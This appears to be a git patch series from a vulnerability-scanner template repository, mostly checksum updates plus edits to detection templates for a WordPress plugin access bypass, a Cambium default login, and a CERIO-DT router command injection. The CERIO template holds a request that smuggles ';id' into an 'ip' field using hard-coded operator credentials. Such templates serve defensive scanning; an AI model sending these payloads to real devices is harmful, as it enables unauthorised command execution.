-http/cves/2018/CVE-2018-16671.yaml:b476134832a83699c3f6f6a9cc62fc14afbb2bcf +http/cves/2018/CVE-2018-16671.yaml:906368ef356b2b4c8965f8046fd49dbef0dd821f http/cves/2018/CVE-2018-16716.yaml:a1f2d156568e8a37a17de9a2759623c13ba02f41 http/cves/2018/CVE-2018-16761.yaml:dbdf46a59546a320d395c2436fbca07cc9c1be86 http/cves/2018/CVE-2018-16763.yaml:804e34994429a56b36f2447a635c4bdc5dd59a07 http/cves/2018/CVE-2018-16836.yaml:98b608b7b785160c1ca398b8ccf5457933dafcbc http/cves/2018/CVE-2018-16979.yaml:94bde7048fe9f62210ccb11497dbc11e1c3b1c99 http/cves/2018/CVE-2018-17153.yaml:e004a49d22b96f5006592b6000346b3c51b7c321 -http/cves/2018/CVE-2018-17246.yaml:32adb5762d66a9817fc2a3a1de90400021bf65ab +http/cves/2018/CVE-2018-17246.yaml:22c110b22233af042e989536ce8b723547993e00 http/cves/2018/CVE-2018-17254.yaml:796bc823bb38f76e61b2c6a7b8d508a6a81a1cb8 http/cves/2018/CVE-2018-17422.yaml:90edc0d3636a6670e628eccc7eea61be4144918b http/cves/2018/CVE-2018-17431.yaml:4f724c2ec11d7e5574b913c8f3d171dc69bf23d6 @@ -1717,7 +1717,7 @@ http/cves/2020/CVE-2020-11455.yaml:db648543edc249d1dda1a67313f2a1ba678f8ada http/cves/2020/CVE-2020-11529.yaml:3a4f8deb2ba9eb5e87c9a4c87aa59bd5bc8b39c3 http/cves/2020/CVE-2020-11530.yaml:e4de2a4e8e617c78ba87fa185790a0495bf0e8da http/cves/2020/CVE-2020-11546.yaml:0028a1adf59ba8524634f55e24652564fc5ce6b5 -http/cves/2020/CVE-2020-11547.yaml:51718edad043528ebbcde65242c7663b7812948c +http/cves/2020/CVE-2020-11547.yaml:494f8cc8b785fabe3ff98877a3174451aebc6daf http/cves/2020/CVE-2020-11710.yaml:c2bde61a09512b2cc4c86a2d7bdaa5e85172896e http/cves/2020/CVE-2020-11738.yaml:4c2e75351d44e91b76d713e865d22f88200e3567 http/cves/2020/CVE-2020-11798.yaml:d9e0f98c88d58160585123f986858af68e699b2e @@ -2076,7 +2076,7 @@ http/cves/2021/CVE-2021-24762.yaml:33c2e8efc337a1f06768b1e6047d6a02c32e9e8a http/cves/2021/CVE-2021-24791.yaml:483a228643827bac8b87d83b78865d8f395bfd39 http/cves/2021/CVE-2021-24827.yaml:61c481595a7dabb304fd1c0cec9c7cd6a6a39684 http/cves/2021/CVE-2021-24838.yaml:0cc51d4d1c10c2f4af870aa9b636013be8130a28 -http/cves/2021/CVE-2021-24849.yaml:0b8d4f84d5bdbcde91094c4d59650386d57abf37 +http/cves/2021/CVE-2021-24849.yaml:cf4dc11f4c272ed7159a418c8fec48d38bebc518 http/cves/2021/CVE-2021-24862.yaml:c12546a4335f7196f4b2813946601c2f74e79cca http/cves/2021/CVE-2021-24875.yaml:af4472bf9db8cc8423ae0c3b0ebe71c3767829bc http/cves/2021/CVE-2021-24891.yaml:d25791df32146893bfb3dc68d5b0175a4a53e2ee @@ -2117,7 +2117,7 @@ http/cves/2021/CVE-2021-25112.yaml:863f1f1178f01d7d278802acb2490d230f2c28b5 http/cves/2021/CVE-2021-25114.yaml:10297fac562f4e9b4758c40509edd8eab28810f1 http/cves/2021/CVE-2021-25118.yaml:bb89b24586f268eeed7c70d7677aa51abb677f32 http/cves/2021/CVE-2021-25120.yaml:180bff131d7b46afe0cbc57424767b9cad725a83 -http/cves/2021/CVE-2021-25281.yaml:aa1b740e4c902b0387a7a487f99a82e45cc72a4d +http/cves/2021/CVE-2021-25281.yaml:bde5a9f73b250b872edc034cbaa883533e6b672d http/cves/2021/CVE-2021-25296.yaml:eebdd9e01f7de42eac8b0acc73ef7737c22d6dc3 http/cves/2021/CVE-2021-25297.yaml:798c5dd2384ee37d90e12cc73b40dd17203a5e3a http/cves/2021/CVE-2021-25298.yaml:a1bd4f65462afa430f096448b5615192e924dc52 @@ -2182,7 +2182,7 @@ http/cves/2021/CVE-2021-29490.yaml:40b5bea457e707732739b67380abd7976c51f14d http/cves/2021/CVE-2021-29505.yaml:499c17d9f306975010f29ed644e4c232907941b4 http/cves/2021/CVE-2021-29622.yaml:79b2ae7f2667471da099f5594f532bbc00626580 http/cves/2021/CVE-2021-29625.yaml:89de3db861b7d733e2ba3aa140262d92187a64c5 -http/cves/2021/CVE-2021-3002.yaml:f80274efeea35bf2c073889b5ab76ce619691b69 +http/cves/2021/CVE-2021-3002.yaml:60618324e66630690c4b85faf6a5b38817601897 http/cves/2021/CVE-2021-30049.yaml:da78546d4d231f264cf840eedd0596d543ab9453 http/cves/2021/CVE-2021-30128.yaml:5d3c104ca678614f3c0b970fd3dab9975f35878c http/cves/2021/CVE-2021-30134.yaml:7528c665e9c5128fe999de9ce7b20a371021ae74 @@ -2212,7 +2212,7 @@ http/cves/2021/CVE-2021-32172.yaml:8fdebff02b3d16ee1e990072fd53e435b1e8dac7 http/cves/2021/CVE-2021-3223.yaml:087280fa99bb84c2ea0ee9e446ede3320cfb4923 http/cves/2021/CVE-2021-32305.yaml:70d9951aa4e2a64bd18be918d669dde6a9a18cf2 http/cves/2021/CVE-2021-32618.yaml:1282d29e43f0a00e93a6fceebed1750a42af490f -http/cves/2021/CVE-2021-32682.yaml:51ca70b0cb3413265ae052b942999f9e3185bfd4 +http/cves/2021/CVE-2021-32682.yaml:31e0b4b5fdcf1ff4fb51b0f653ecfbce0ec0d9d2 http/cves/2021/CVE-2021-32789.yaml:03bf6b93c36208174b66afb4a806a53868ed54de http/cves/2021/CVE-2021-32819.yaml:380a8078feba8f1bc4e50b118a121f74d6cf25f8 http/cves/2021/CVE-2021-32820.yaml:c8e898d2d63b318200ed63044d0be7334a2e6f1b @@ -2312,7 +2312,7 @@ http/cves/2021/CVE-2021-40972.yaml:d27431d64ba53011509e840670cc2119f4dc6be9 http/cves/2021/CVE-2021-40973.yaml:e4beb729c195766e7d1b9460eb88a622e2780258 http/cves/2021/CVE-2021-40978.yaml:62ebc40431004d08ba54cf76229e706d2402c44a http/cves/2021/CVE-2021-41174.yaml:4c24cd07dea7803624fb8d4cfa46b618c024d961 -http/cves/2021/CVE-2021-41192.yaml:429f7fe2a345a9b2aafffe5d8876b9461813840d +http/cves/2021/CVE-2021-41192.yaml:601ba7b0718721723f1f23a60b055c0f03c7c755 http/cves/2021/CVE-2021-41266.yaml:8d081cc6e83f9e2b3397e60a81a16ec1a281b930 http/cves/2021/CVE-2021-41277.yaml:8fda77b1487c28d680cc2eae21e04c291c2a660d http/cves/2021/CVE-2021-41282.yaml:40c118c32ea07c6cbfab601a6e9c7999dd44ac79 @@ -2467,7 +2467,7 @@ http/cves/2022/CVE-2022-0824.yaml:834df363f2d408a096b0e7c39a96f875659e99df http/cves/2022/CVE-2022-0826.yaml:c968716c056d8bac29c828f6de28d91fe05c9131 http/cves/2022/CVE-2022-0827.yaml:08336164d26872a6cc676046ef7a1e26af4d1d30 http/cves/2022/CVE-2022-0846.yaml:f79dd734e1a26b052d0e36f9492518e49c90678c -http/cves/2022/CVE-2022-0864.yaml:1a6baf788487f6ebf716823b6c3191ef8da02348 +http/cves/2022/CVE-2022-0864.yaml:5c7707d5caef3af0c8a26df70fa01c5bb9eace7e http/cves/2022/CVE-2022-0867.yaml:6e863875d948eb2710e1bd9f80b30a8a4a84e1ce http/cves/2022/CVE-2022-0869.yaml:eac3f6cb08a6fde39633b57380547f077d31f125 http/cves/2022/CVE-2022-0870.yaml:50d1fffb2a551f946af8743ee205f95504659338 @@ -2560,7 +2560,7 @@ http/cves/2022/CVE-2022-23881.yaml:af0d94cea1d7840f3800ea02e4e602cf960d2530 http/cves/2022/CVE-2022-23898.yaml:f8c8e4e7f9865bcec5cf8dac00c5c7bab1866bf2 http/cves/2022/CVE-2022-23944.yaml:320d92bd111caf4003aeac9a1ef9f65cee4f1f5d http/cves/2022/CVE-2022-24112.yaml:4034ea358c38ea2642cfbafd6bc5f9949c0e9a74 -http/cves/2022/CVE-2022-24124.yaml:8892e5824c33368ec1d301ce8911f00e3da4b28d +http/cves/2022/CVE-2022-24124.yaml:85c1904f8c2d576f24afbcbbaaa093f994074cb8 http/cves/2022/CVE-2022-24129.yaml:e9b5d1244a8f2dea948ea4cfb46b3756f0292aea http/cves/2022/CVE-2022-2414.yaml:68d31eaf41572c264f08d1f4bc5041cdb6543a36 http/cves/2022/CVE-2022-24181.yaml:776437592260aa5a0b327bd750557745bb2fa704 @@ -2967,7 +2967,7 @@ http/cves/2023/CVE-2023-26067.yaml:a9b18f2101c4ada25295447e64d845c7fb5c4266 http/cves/2023/CVE-2023-26255.yaml:72ba0cb106a848cbf4550abb5e379601fc8d57c7 http/cves/2023/CVE-2023-26256.yaml:235515a1f0e49888d8e059097494109563de4d3f http/cves/2023/CVE-2023-26347.yaml:e2a80f4ae72176cbd3d0b523754f551888e7bbda -http/cves/2023/CVE-2023-26360.yaml:20a2d969c967e6eff664ae11ef103045267d14f2 +http/cves/2023/CVE-2023-26360.yaml:8985b3d841f6b32d33228f02fb4a29cfd1c2f647 http/cves/2023/CVE-2023-26469.yaml:fef5e0a0a6c5d3fb658813db3402193eb13a9711 http/cves/2023/CVE-2023-2648.yaml:41ec7f7a05226cc4b5805c7b3018d5d492f21343 http/cves/2023/CVE-2023-26842.yaml:a8e888fe71856500458f993a7623c95a5acf2d34 @@ -2997,7 +2997,7 @@ http/cves/2023/CVE-2023-2822.yaml:b638b609770d15a230fa7246f171a5a654bce03e http/cves/2023/CVE-2023-2825.yaml:e52fcd86c715c973f0d368fec0a8bbe61a0aa3ac http/cves/2023/CVE-2023-28343.yaml:c781cd98e3899efad10ad98e84ccad6bb0d2435c http/cves/2023/CVE-2023-28432.yaml:257ea32d858fb24d05fd61158b2c57b3ce5766f1 -http/cves/2023/CVE-2023-28662.yaml:222138e63a1f9e06b5f00d0888a71b3ab9c5cbc2 +http/cves/2023/CVE-2023-28662.yaml:ad336c6a3427d0b47407455c18a117052d0bff5a http/cves/2023/CVE-2023-28665.yaml:f7cbf06ff60743045c2b85276c87e28b0182c049 http/cves/2023/CVE-2023-29084.yaml:c13b9fdcac929cdff02edcde7bd85a1b97fd8c31 http/cves/2023/CVE-2023-29298.yaml:2dd762a56ce650feb87703cf13af9ad126d8103a @@ -3036,7 +3036,7 @@ http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b http/cves/2023/CVE-2023-3219.yaml:30c6a139afeb951daf2ed2734dcae25ef3db05ca http/cves/2023/CVE-2023-32235.yaml:97088e4dd3fc67bdf37659084e1c32fdb2670818 http/cves/2023/CVE-2023-32243.yaml:bcbf1f8b9ae1c03a606866feaffa2c71ba08878b -http/cves/2023/CVE-2023-32315.yaml:e083330b0d26565dca2ede8a3c21d3eb54b253f2 +http/cves/2023/CVE-2023-32315.yaml:4006dcea314168a66f3d898049017ac193275066 http/cves/2023/CVE-2023-32563.yaml:3ac13df7389a44c872cfc4bb0916de89c6912b40 http/cves/2023/CVE-2023-33338.yaml:64557689950914621e4b59c37bab423ac5ad636a http/cves/2023/CVE-2023-33405.yaml:fd578aece75fa256b7e9d6fbfd1d5beac0ac400c @@ -3055,7 +3055,7 @@ http/cves/2023/CVE-2023-34192.yaml:9ec18d446637d67669489485e338d8bb08e3e95a http/cves/2023/CVE-2023-34259.yaml:c522d53c7b0766136d4356c8330eb60fbe2ff6a7 http/cves/2023/CVE-2023-34362.yaml:5e6a1ddcdf96d45153174df95d001082d9e22b1c http/cves/2023/CVE-2023-34537.yaml:ce2b42c314ea85f2cf7f4081e19600bcd2c5db7c -http/cves/2023/CVE-2023-34598.yaml:1be9a6039ef50f2c4d57ec9bcc6f72221843af61 +http/cves/2023/CVE-2023-34598.yaml:586bd46c54d95b6e72b3840c99dd993b235c68b8 http/cves/2023/CVE-2023-34599.yaml:252d4509a26d36ab69876630693c3bf216802eb3 http/cves/2023/CVE-2023-3460.yaml:88688540a54e02217069f7359cdbe3ddfde15289 http/cves/2023/CVE-2023-34659.yaml:752f2d986befb41386fb76463ee258482a720d80 @@ -3183,7 +3183,7 @@ http/cves/2023/CVE-2023-46347.yaml:45e9463fdbd5e2ec433e92f26e86c456fae42ffa http/cves/2023/CVE-2023-46359.yaml:2c5eadff5358c49c151934a282621b2bfce3bf92 http/cves/2023/CVE-2023-46574.yaml:3ee23f056a218c79387d3ae1c3cdbb51aeba5191 http/cves/2023/CVE-2023-46747.yaml:b010f6e5c18a3f337a7f2e266f9330a39635d36c -http/cves/2023/CVE-2023-46805.yaml:916b3454c9764492dc7ae8ee347edf46837e3c81 +http/cves/2023/CVE-2023-46805.yaml:0291b05889fcafa128183288afb7bd84e7db4b00 http/cves/2023/CVE-2023-47115.yaml:f5f0d4869bc075f448f560f87f29febd4cc63497 http/cves/2023/CVE-2023-4714.yaml:954bbf773a17e757e0e6643ef410202037e7c8f1 http/cves/2023/CVE-2023-47211.yaml:bf40361838f0afc267bc6c62161b3f0526a2b234 @@ -3231,7 +3231,7 @@ http/cves/2023/CVE-2023-6623.yaml:182c33805efba63a9f987417b6e13ce81c8643e9 http/cves/2023/CVE-2023-6634.yaml:d517962a1689dbbaefe2ea502e451ba9009f1dd5 http/cves/2023/CVE-2023-6831.yaml:d1a44c75188bceced79fce8fe5b7f31e1e824e4b http/cves/2023/CVE-2023-6875.yaml:2e8817b2133461b7fdb1b0d59f4c197202c3bd60 -http/cves/2023/CVE-2023-6895.yaml:584cf32c7d75ecd6dd264de23662de3855103f05 +http/cves/2023/CVE-2023-6895.yaml:280030bb44a21b5263dd9f29092154566d82fde7 http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14 @@ -3246,7 +3246,7 @@ http/cves/2024/CVE-2024-0352.yaml:e324d6ccb69d2bee50aa487f5e068cc005c715d8 http/cves/2024/CVE-2024-0713.yaml:391fe60dbb13edaff0fb693b1b25fb71dcfb0241 http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437 http/cves/2024/CVE-2024-1021.yaml:a48c4dce997dffd7ee3b988bc0dc646f2cf840d7 -http/cves/2024/CVE-2024-1061.yaml:3ca4c2f35a403c5067ef7b8795b307417436fa4f +http/cves/2024/CVE-2024-1061.yaml:df85be53c1a8e56e06eb9abf580e173b7d9b984d http/cves/2024/CVE-2024-1071.yaml:f9280444cf13a8677b365b28c1bf7cd991829d9c http/cves/2024/CVE-2024-1183.yaml:13a0cbff374005b467ac0b663f895021b5d981a8 http/cves/2024/CVE-2024-1208.yaml:e0b4c4dbc3dc37bbb522622e5dd6c882f02b05b8 @@ -3259,9 +3259,9 @@ http/cves/2024/CVE-2024-1709.yaml:ef74f7909789dfeec2ad788dc3fb37ba5d06e270 http/cves/2024/CVE-2024-20767.yaml:2b596e323ac39c761e0cf7efc3cbc4a772079a0d http/cves/2024/CVE-2024-21644.yaml:2156925d0fe7c84d0e8b43f7681bcd2409386996 http/cves/2024/CVE-2024-21645.yaml:5bd013f892b97ec56eefc5dc0b423d8b62e66864 -http/cves/2024/CVE-2024-21887.yaml:cb8d4d94a8080fecc469fb969cc160593ba3982e -http/cves/2024/CVE-2024-21893.yaml:64a8c554db1ed2abfcbc75e53be146faec3f10f2 -http/cves/2024/CVE-2024-22024.yaml:224f5d9d9a963ca2833b033e443665bca843216c +http/cves/2024/CVE-2024-21887.yaml:a3fd62da315d80a98fc1b4d8101d6b65babf26df +http/cves/2024/CVE-2024-21893.yaml:7ac92ba24a2d8b42594efe52a920aca9a9dd760b +http/cves/2024/CVE-2024-22024.yaml:9a4da0db5d10fde48c88f49e52f798220ceea7db http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb http/cves/2024/CVE-2024-22927.yaml:55eada76a32a5cb2d7c30cebb426f9efb40a0c7c @@ -8558,7 +8558,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c703523bfec4c8d187b64761937a051ab2d45a4f +templates-checksum.txt:21262ffbe74e95362afde026f8b21f4603084781 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0b74846d743b2cc4dd62259b72e153c088b39230 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 24 May 2024 10:56:32 +0530 Subject: [PATCH 1289/1768] minor update --- http/cves/2022/CVE-2022-1580.yaml | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/http/cves/2022/CVE-2022-1580.yaml b/http/cves/2022/CVE-2022-1580.yaml index 4dca43836e..d7ae9a80db 100644 --- a/http/cves/2022/CVE-2022-1580.yaml +++ b/http/cves/2022/CVE-2022-1580.yaml @@ -6,6 +6,7 @@ info: severity: medium description: | The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature. + remediation: Fixed in 1.5.3 reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-1580 - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/ @@ -15,14 +16,16 @@ info: cve-id: CVE-2022-1580 cwe-id: CWE-639 epss-score: 0.00058 - epss-percentile: 0.23919 + epss-percentile: 0.24444 cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:* metadata: + verified: true + max-request: 1 vendor: freehtmldesigns product: site_offline framework: wordpress - tags: wpscan,cve2022,bypass,wordpress,wordpress-plugin - + publicwww-query: "/wp-content/plugins/site-offline/" + tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp flow: http(1) && http(2) http: @@ -46,7 +49,8 @@ http: words: - "wp-block" - "author" - condition: or + condition: and + - type: status status: - 200 From ec1b66cf894ded4a33670361715d0bf66233fe4b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 24 May 2024 11:18:46 +0530 Subject: [PATCH 1290/1768] name and matcher type update --- http/cves/2022/CVE-2022-1580.yaml | 18 +++++++----------- 1 file changed, 7 insertions(+), 11 deletions(-) diff --git a/http/cves/2022/CVE-2022-1580.yaml b/http/cves/2022/CVE-2022-1580.yaml index d7ae9a80db..967f1b2b8b 100644 --- a/http/cves/2022/CVE-2022-1580.yaml +++ b/http/cves/2022/CVE-2022-1580.yaml @@ -1,15 +1,15 @@ id: CVE-2022-1580 info: - name: Site Offline WP Plugin < 1.5.3 - Access Bypass + name: Site Offline WP Plugin < 1.5.3 - Authorization Bypass author: Kazgangap severity: medium description: | The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature. remediation: Fixed in 1.5.3 reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-1580 - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1580 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 @@ -26,6 +26,7 @@ info: framework: wordpress publicwww-query: "/wp-content/plugins/site-offline/" tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp + flow: http(1) && http(2) http: @@ -43,14 +44,9 @@ http: path: - "{{BaseURL}}/?admin" - matchers-condition: and matchers: - - type: word - words: - - "wp-block" - - "author" + - type: dsl + dsl: + - 'contains_all(body, "wp-block", "author")' + - 'status_code == 200' condition: and - - - type: status - status: - - 200 From d2f6043f490a335e45e2de8c1f79544361309ce0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 05:55:41 +0000 Subject: [PATCH 1291/1768] Auto Generated New Template Addition List [Fri May 24 05:55:40 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e69de29bb2..ea08acdc7f 100644 --- a/.new-additions +++ b/.new-additions @@ -0,0 +1 @@ +http/cves/2022/CVE-2022-1580.yaml From a9e646e091b348b82d88565591357c657692e892 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 05:55:46 +0000 Subject: [PATCH 1292/1768] Auto Generated Templates Checksum [Fri May 24 05:55:46 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9189aa4173..7d5c766de5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2502,6 +2502,7 @@ http/cves/2022/CVE-2022-1398.yaml:8168fc6638082f59e200f1101d369a35f0d123ed http/cves/2022/CVE-2022-1439.yaml:cbe0052e425f9e50c6b1c8f5485bf9324a314ff9 http/cves/2022/CVE-2022-1442.yaml:a52d96a918ba3035fe49f7fd40e49109c6071868 http/cves/2022/CVE-2022-1574.yaml:a5798fd0745aa94b4223ab067849053809d1218c +http/cves/2022/CVE-2022-1580.yaml:e5f9bcc61e6fbd74c2ad70c0c6b790127a952acc http/cves/2022/CVE-2022-1595.yaml:c64eac9bb84bf79b3d25cf6f2dacb4fce225c9f7 http/cves/2022/CVE-2022-1597.yaml:0fd2522119f23d28516369b0f6e579ab802d032c http/cves/2022/CVE-2022-1598.yaml:9755cec2c1a4c02ba84abdc819c53082af2ab59e @@ -8558,7 +8559,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:21262ffbe74e95362afde026f8b21f4603084781 +templates-checksum.txt:420cd51492085071f2013177d28b721de25e3c22 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 50780f29d9721c35bd26f46f3b89f53c0112d86a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 05:56:23 +0000 Subject: [PATCH 1293/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 37f01c16d6..eb128ebd4d 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cves/2022/CVE-2022-1580.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 88bcce9ecb4edb8aeb6c66c61f8915dbb690aaa7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 05:57:38 +0000 Subject: [PATCH 1294/1768] Auto Template Signing [Fri May 24 05:57:38 UTC 2024] :robot: --- http/cves/2022/CVE-2022-1580.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2022/CVE-2022-1580.yaml b/http/cves/2022/CVE-2022-1580.yaml index 967f1b2b8b..bb9095f37a 100644 --- a/http/cves/2022/CVE-2022-1580.yaml +++ b/http/cves/2022/CVE-2022-1580.yaml @@ -50,3 +50,4 @@ http: - 'contains_all(body, "wp-block", "author")' - 'status_code == 200' condition: and +# digest: 490a0046304402205775924c4103208abbf0e83892c8a44428ab42b0f64f7a401f435217841af96a02205f982b0c88cdde5b367ddf12f3e1f257b13a8394de22ca29e2d34b4f3d37cedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 12e7d6a9e03a0e254230ab3c7658ecacc541727c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 24 May 2024 11:44:27 +0530 Subject: [PATCH 1295/1768] Update cambium-networks-default-login.yaml --- .../cambium-networks/cambium-networks-default-login.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml index 8e8af91d8d..fd5a8e520f 100644 --- a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml +++ b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: title="Welcome to Canopy" - tags: default-login,cambium-networks + tags: default-login,cambium,canopy http: - raw: @@ -37,7 +37,6 @@ http: part: body words: - "Logged in as root" - condition: and - type: status status: From 1af6114dcb2b959aeb774af55f8c25d4efce6d28 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 24 May 2024 11:51:58 +0530 Subject: [PATCH 1296/1768] Update cerio-dt-rce.yaml --- http/vulnerabilities/other/cerio-dt-rce.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/other/cerio-dt-rce.yaml b/http/vulnerabilities/other/cerio-dt-rce.yaml index 985d765643..b1879b1709 100644 --- a/http/vulnerabilities/other/cerio-dt-rce.yaml +++ b/http/vulnerabilities/other/cerio-dt-rce.yaml @@ -1,7 +1,7 @@ id: cerio-dt-rce info: - name: CERIO-DT Save.cgi interface - Command Execution + name: CERIO-DT Interface - Command Execution author: pussycat0x severity: critical description: | @@ -11,6 +11,8 @@ info: - https://github.com/tanjiti/sec_profile - https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md metadata: + max-request: 1 + verified: true fofa-query: title="DT-100G-N" || title="DT-300N" || title="DT-100G" || title="AMR-3204G" || title="WMR-200N" tags: cerio,rce @@ -21,7 +23,6 @@ http: Host: {{Hostname}} Authorization: Basic b3BlcmF0b3I6MTIzNA== Content-Type: application/x-www-form-urlencoded - Content-Length: 33 pid=2061&ip=127.0.0.1;id×=1 @@ -31,7 +32,6 @@ http: part: body regex: - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" - condition: and - type: status status: From 34f38c4283095a70298d723fd022da537b09d891 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 06:22:27 +0000 Subject: [PATCH 1297/1768] Auto Generated New Template Addition List [Fri May 24 06:22:27 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ea08acdc7f..35199e09a7 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ http/cves/2022/CVE-2022-1580.yaml +http/default-logins/cambium-networks/cambium-networks-default-login.yaml From 04a4c29907c4cd553708ca4c2ad12c19144e3113 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 06:22:34 +0000 Subject: [PATCH 1298/1768] Auto Generated Templates Checksum [Fri May 24 06:22:34 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7d5c766de5..16095914c1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2502,7 +2502,7 @@ http/cves/2022/CVE-2022-1398.yaml:8168fc6638082f59e200f1101d369a35f0d123ed http/cves/2022/CVE-2022-1439.yaml:cbe0052e425f9e50c6b1c8f5485bf9324a314ff9 http/cves/2022/CVE-2022-1442.yaml:a52d96a918ba3035fe49f7fd40e49109c6071868 http/cves/2022/CVE-2022-1574.yaml:a5798fd0745aa94b4223ab067849053809d1218c -http/cves/2022/CVE-2022-1580.yaml:e5f9bcc61e6fbd74c2ad70c0c6b790127a952acc +http/cves/2022/CVE-2022-1580.yaml:0e94c20783866096e69931ba80caccbf03b74fdb http/cves/2022/CVE-2022-1595.yaml:c64eac9bb84bf79b3d25cf6f2dacb4fce225c9f7 http/cves/2022/CVE-2022-1597.yaml:0fd2522119f23d28516369b0f6e579ab802d032c http/cves/2022/CVE-2022-1598.yaml:9755cec2c1a4c02ba84abdc819c53082af2ab59e @@ -3339,6 +3339,7 @@ http/default-logins/barco-clickshare-default-login.yaml:cac1f9f84f536daf4f7d3b21 http/default-logins/batflat/batflat-default-login.yaml:983b4bc3ea5162cd92de42686894cfde4482ca8d http/default-logins/bloofoxcms-default-login.yaml:521262f1b70cf41dabf50e7022c8d6874ad6f472 http/default-logins/caimore/caimore-default-login.yaml:fa6dc9fbfefd35cbe6b0122cbe2063f51286d122 +http/default-logins/cambium-networks/cambium-networks-default-login.yaml:2efac1e32f1a75cf4cae77732fb0521d5f2eff44 http/default-logins/camunda/camunda-default-login.yaml:e0ba275d0aeadc4a4e0df5010277d2db9e6329e7 